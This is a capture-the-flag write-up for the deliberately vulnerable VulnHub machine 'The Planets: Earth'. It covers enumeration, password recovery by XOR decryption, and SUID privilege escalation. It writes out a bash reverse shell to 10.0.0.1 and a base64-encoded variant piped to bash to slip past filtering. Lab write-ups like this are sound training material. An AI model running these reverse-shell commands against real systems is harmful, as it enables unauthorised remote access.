The Planets: Earth is a part of a series available on VulnHub called “The Planets”. This VM has a difficulty rating of easy. The Earth VM includes two flags: a user flag and a root flag, both represented as MD5 hashes. This machine is designed for VirtualBox environments, and using it on VMware might cause compatibility issues. The goal is to provide a learning experience for beginners and intermediate penetration testers, focusing on enumeration, exploitation, and privilege escalation techniques.
Methodologies and Tools Used:
- Host Discovery:
Tool:netdiscover
Purpose: Identify the target IP address. - Port Scanning and Service Enumeration:
Tool:nmap
Purpose: Discover open ports and services. - Web Application Vulnerability Scanning:
Tool:gobuster
Purpose: Identify vulnerabilities and default credentials in the web application. - Exploitation:
Tool:cyberchef,netcat
Purpose: Decrypt the hexadecimal message and establish a connection. - Privilege Escalation:
Tool:ltrace,netcat
Purpose: Find out what’s wrong with the script and establish a connection to upload the script.
A. Enumeration
After obtaining the IP Address using netdiscover, we proceeded to perform a scan using nmap to discover open ports and gather detailed information about the services running on the target.
nmap -sV -sC -p- <IP Address>Press enter or click to view image in full size
Results of the open ports:
- Port 22
- Port 80
- Port 443
We noticed there are 2 host names on port 443: earth.local and terratest.earth.local. So, let’s add both host names to the /etc/hosts file.
sudo nano /etc/hostsThen, we focused on enumerating those two host names, earth.local and terratest.earth.local.
1. Earth.local — Web Application Enumeration
Next, we navigate to the domain http://earth.local/ in the web browser.
Press enter or click to view image in full size
After attempting to gather information on the website, we will proceed with directory busting using gobuster.
gobuster dir -u <Target Address> -w /path/to/wordlistPress enter or click to view image in full size
We get an interesting directory named as admin, let’s see what’s inside this directory:
Press enter or click to view image in full size
Admin Command Tool?! But we’re asked to log in, and we don’t have access to the information yet.
Press enter or click to view image in full size
Let’s search for additional information on the second domain.
2. Terratest.earth.local— Web Application Enumeration
Now we navigate to the domain https://terratest.earth.local/ in the web browser.
Press enter or click to view image in full size
After
attempting to gather information by view the page source on the website
and found nothing, we will proceed with directory busting using gobuster.
gobuster dir -u https://terratest.earth.local/ -k -w /path/to/wordlistPress enter or click to view image in full size
After performing directory busting, we found an interesting file: robots.txt. Let’s see what’s inside this file:
Press enter or click to view image in full size
We found another interesting file: testingnotes.txt. Let’s see what’s inside this file:
Press enter or click to view image in full size
We found a note. From the note, we can gather that:
- Terra is the username.
- The hexadecimal message we found at
http://earth.local/is encrypted with XOR. - The encryption key is located in the file
testdata.txt.
Now, let’s see what’s inside the file testdata.txt.
Press enter or click to view image in full size
Now we have the username, key, and the type of encryption. Let’s start the exploitation.
B. Exploitation
Now we are going to decrypt the hexadecimal message on the domain http://earth.local/ using the cyberchef tool.
Press enter or click to view image in full size
Is that the password?! I think we found the password, let’s try to log in!
Press enter or click to view image in full size
Yayy we’re in!!! And let’s try to make a remote connection with our machine.
Get Galihabraa’s stories in your inbox
Join Medium for free to get updates from this writer.
Set Listening Port
nc -nlvp 5555
Send The Bash Reverse Shell
bash -i >& /dev/tcp/10.0.0.1/5555 0>&1Press enter or click to view image in full size
It turns out we couldn’t establish a connection using that method. Let’s try encoding the command using Base64 format.
echo "bash -i >& /dev/tcp/10.0.0.1/5555 0>&1" | base64Press enter or click to view image in full size
And now, try establishing the connection again using the Base64 decoded command.
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY5LjQvNTU1NSAwPiYxCg== | base64 -d | bashPress enter or click to view image in full size
Here we got the access…. Yayyy!!!!
Press enter or click to view image in full size
User Flag
We can obtain the user flag in the file /var/earth_web/user_flag.txt.
Press enter or click to view image in full size
C. Privilege Escalation
We will search for files with 4000 permissions, as they can be used for privilege escalation.
find / -perm -4000 -type f 2>/dev/nullPress enter or click to view image in full size
We found an interesting file: /usr/bin/reset_root. This might help us gain root access. Let’s identify the file type using the file command.
Press enter or click to view image in full size
Let’s run the script…
RESET FAILED?!! Let’s find out what is the problem with the script using the ltrace tool. But first, we need to upload the file to the local machine using netcat.
Press enter or click to view image in full size
After successfully downloading, grant execute permissions to the file using the command chmod +x. Then, use the ltrace tool on the file.
chmod +x reset_rootltrace ./reset_rootPress enter or click to view image in full size
From the output, it appears that there are 3 missing files, so we need to create them on the target machine.
Press enter or click to view image in full size
Now let’s execute the reset_file again…
Press enter or click to view image in full size
Finally, we obtained the root password, and now let’s switch to the root user.
Root Flag
After successfully logging in as root, we can obtain the root flag in the root directory.
Press enter or click to view image in full size
Press enter or click to view image in full size
